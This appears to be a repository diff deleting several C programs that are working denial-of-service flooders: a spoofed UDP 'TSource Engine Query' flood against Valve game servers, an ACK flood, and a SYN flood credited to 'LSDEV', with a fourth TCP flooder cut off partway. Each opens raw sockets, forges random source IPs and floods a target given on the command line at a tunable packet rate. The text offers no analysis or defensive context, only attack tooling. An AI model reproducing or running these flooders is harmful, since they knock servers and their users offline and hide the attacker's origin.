printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
|
|
||||||
printf("\e[1musage\e[0m: %s [-T0 -T1 -T2 -T3 -T4 -T5 -T6 -T7 -U -I] -h -t\n", argv0);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
Binary file not shown.
Binary file not shown.
@ -1,176 +0,0 @@
|
|||||||
/*
|
|
||||||
* Valve Source Engine Layer 7 by LSDEV
|
|
||||||
*/
|
|
||||||
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/udp.h>
|
|
||||||
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 25;
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = IPPROTO_UDP;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_udp_header(struct udphdr *udph)
|
|
||||||
{
|
|
||||||
udph->source = htons(27015);
|
|
||||||
udph->dest = htons(27015);
|
|
||||||
udph->check = 0;
|
|
||||||
void *data = (void *)udph + sizeof(struct udphdr);
|
|
||||||
memset(data, 0xFF, 4);
|
|
||||||
strcpy(data+4, "TSource Engine Query");
|
|
||||||
udph->len=htons(sizeof(struct udphdr) + 25);
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(17015);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_udp_header(udph);
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 5){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Valve Source Engine Layer 7 by LSDEV\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
|
|
||||||
int num_threads = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[3]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
|
|
||||||
int multiplier = 20;
|
|
||||||
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
Binary file not shown.
@ -1,216 +0,0 @@
|
|||||||
/*
|
|
||||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
|
||||||
*/
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
|
|
||||||
#define MAX_PACKET_SIZE 65534
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = rand();
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = rand();
|
|
||||||
tcph->res2 = 0;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->ack = 1;
|
|
||||||
tcph->window = rand();
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->urg_ptr = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = rand();
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
|
|
||||||
tcph->dest = rand();
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 5){
|
|
||||||
fprintf(stderr, "Improper ACK flood parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
|
|
||||||
int num_threads = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[3]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
|
|
||||||
int multiplier = 100;
|
|
||||||
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
Binary file not shown.
@ -1,215 +0,0 @@
|
|||||||
#include <pthread.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <time.h>
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
char ip[17];
|
|
||||||
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(rand()%54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr(ip);
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(rand()%65535);
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = 0;
|
|
||||||
tcph->res2 = 0;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->syn = 1;
|
|
||||||
tcph->window = htonl(65535);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->urg_ptr = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(floodport);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
|
|
||||||
tcph->dest = htons(floodport);
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
|
|
||||||
|
|
||||||
tcph->dest = htons(floodport);
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "SSYN Flooder by LSDEV\nImproved by Starfall\nUsage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
srand(time(0));
|
|
||||||
fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");
|
|
||||||
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
floodport = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[4]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
|
|
||||||
int multiplier = 20;
|
|
||||||
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,220 +0,0 @@
|
|||||||
/*
|
|
||||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
|
||||||
*/
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(5678);
|
|
||||||
tcph->seq = rand();
